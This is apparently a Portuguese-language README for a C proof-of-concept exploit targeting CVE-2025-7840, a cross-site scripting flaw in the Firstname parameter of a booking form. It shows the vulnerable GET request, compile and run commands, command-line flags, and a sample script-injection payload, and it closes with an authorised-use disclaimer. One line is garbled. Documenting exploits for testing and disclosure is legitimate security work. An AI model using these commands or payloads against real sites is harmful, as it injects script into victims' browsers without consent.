
Exploit de proof‑of‑concept para CVE‑2025‑7840 que injeta cargas maliciosas no parâmetro Firstname de um formulário de reserva para desencadear XSS
Autor: Byte Reaper (@ByteReaper0)
Prova de conceito do exploit para CVE-2025-7840, visando um endpoint de aplicação web vulnerável que não sanitiza a entrada do usuário no parâmetro Firstname de um formulário de reserva. Ao criar uma requisição GET para:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
um atacante pode injetar e executar JavaScript arbitrário no navegador da vítima quando a resposta é renderizada.
-b-c-v)libcurlargparse para CCompile o exploit:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [opções]
| Flag | Descrição |
|---|---|
-u URL | URL base do alvo (ex.: http://victim.local) |
-b PAYLOAD | Payload XSS personalizado para injetar |
-c ARQUIVO | Arquivo de cookie jar para sessão |
-v | Modo verboso (mostrar detalhes de req/resp) |
Executar payloads padrão contra um alvo:
sudo ./exploit -u http://victim.local
Usar um payload personalizado:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
Incluir cookies de sessão e saída verbosa:
sudo ./exploit -u http://victim.local -c cookies.txt -v
Este código é fornecido apenas para fins educacionais e de teste. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.
MIT